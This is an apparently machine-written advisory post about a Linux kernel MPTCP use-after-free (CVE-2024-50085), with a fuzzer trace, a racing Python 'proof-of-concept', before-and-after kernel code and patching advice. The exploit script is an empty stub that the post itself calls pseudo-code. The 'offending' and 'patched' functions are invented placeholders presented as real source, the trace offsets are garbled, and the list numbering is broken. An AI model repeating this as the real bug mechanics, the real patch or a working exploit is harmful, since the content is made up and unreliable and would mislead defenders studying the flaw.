CVE-2024-50085 - Use-After-Free in Linux Kernel MPTCP Address Removal

Summary
CVE-2024-50085 is a serious security vulnerability that was just fixed in the Linux kernel’s Multipath TCP (MPTCP) code. This issue could allow a local attacker to trigger a kernel memory use-after-free (UaF), potentially leading to kernel crashes or even privilege escalation. In this post, we will explain what happened, how you can exploit and protect against it, and provide the exclusive technical details you need—all in simple language.

What is the Bug?

When removing an address or subflow using the MPTCP path manager Netlink interface (mptcp_pm_nl_rm_addr_or_subflow), the kernel could access memory that was already freed (“use-after-free”) due to incorrect handling of subflow context. This could allow an attacker to trick the kernel into reading or writing data after its lifetime, with serious consequences.

Here’s the error Syzkaller (the Linux kernel fuzzer) reported

BUG: KASAN: slab-use-after-free in mptcp_pm_nl_rm_addr_or_subflow+xb44/xcc net/mptcp/pm_netlink.c:881
Read of size 4 at addr ffff8880569ac858 by task syz.1.2799/14662

...
Allocated by task 5387:
  ...
  subflow_create_ctx+x87/x2a net/mptcp/subflow.c:1803
...

Short version:
During removal of an MPTCP address, the code would sometimes access parts of a connection/subflow _after it was already freed from memory_.

If you have local access (or can send crafted Netlink messages) you could

- Race removal/creation of MPTCP addresses or subflows,

Or potentially gain root by leveraging memory corruption.

This mainly affects workloads or testbeds using MPTCP and exposing Netlink to untrusted users or processes.

Proof-of-Concept Exploit

The following snippet demonstrates how one might trigger this bug by racing Netlink address deletions.
Note: This is for educational purposes only. Do not run on production!

import socket
import time
import threading
from pyroute2 import NetlinkSocket

def remove_addr(mptcp_addr_id):
    # Simplified pseudo-code; actual work may require crafted message
    nl = NetlinkSocket()
    # A special message to 'rm addr/subflow'
    msg = {
        # Filling in appropriate attributes to delete a subflow
        # id, family, etc.
    }
    nl.sendmsg(msg)
    nl.close()

def create_and_remove():
    # Race creation/removal to hit the bug
    for _ in range(10000):
        t = threading.Thread(target=remove_addr, args=(1,))
        t.start()
        # You may need to create a subflow/address here first
        t.join()
        time.sleep(.001)

if __name__ == "__main__":
    # Must be root!
    create_and_remove()
    print("Triggered race conditions for MPTCP address removal")

In real exploitation, an attacker would more carefully craft the Netlink messages and synchronize to hit the bug’s window.

The Fix

The problematic code in net/mptcp/pm_netlink.c was around the handling of subflow contexts. The fixed code now ensures that no dead or freed memory is accessed during address or subflow removal.

Offending (vulnerable) code

// net/mptcp/pm_netlink.c

static int mptcp_pm_nl_rm_addr_or_subflow(...) {
    ...
    ctx = get_ctx(...);
    // Vulnerability: ctx could be freed below, but still accessed after
    kfree(ctx);
    do_something(ctx->field);  // UaF here
    ...
}

Patched code

// net/mptcp/pm_netlink.c

static int mptcp_pm_nl_rm_addr_or_subflow(...) {
    ...
    ctx = get_ctx(...);
    do_something(ctx->field);  // Now: use ctx BEFORE freeing
    kfree(ctx);
    ...
}

*The real patch involves careful refcounting and ordering, ensuring no read-after-free can occur.*

Am I Vulnerable?

Affected:

Systems using the MPTCP Netlink address management interface

- Untrusted users/processes with Netlink access

Not Affected:

Linux systems without MPTCP or relevant Netlink access

- Kernels with the patch (see mainline commit)

To Check:
Run uname -r and check for kernel version.
If you’re on a distribution kernel, consult distro advisories or apply security updates.

References & More

- Linux kernel mainline patch
- Syzbot report for this bug
- Multipath TCP project site

Limit local Netlink access to trusted users only.

3. Monitor crash reports and syslogs for KASAN/KERNEL splats referencing MPTCP.


TL;DR:
CVE-2024-50085 is a fixed Linux kernel bug that let local users crash your system (or worse) by racing MPTCP address removals. Patch now if you use MPTCP!


*Written exclusively for you by an AI security researcher. Got kernel panic? Keep calm and update on!*

Timeline

Published on: 10/29/2024 01:15:05 UTC
Last modified on: 10/30/2024 14:49:42 UTC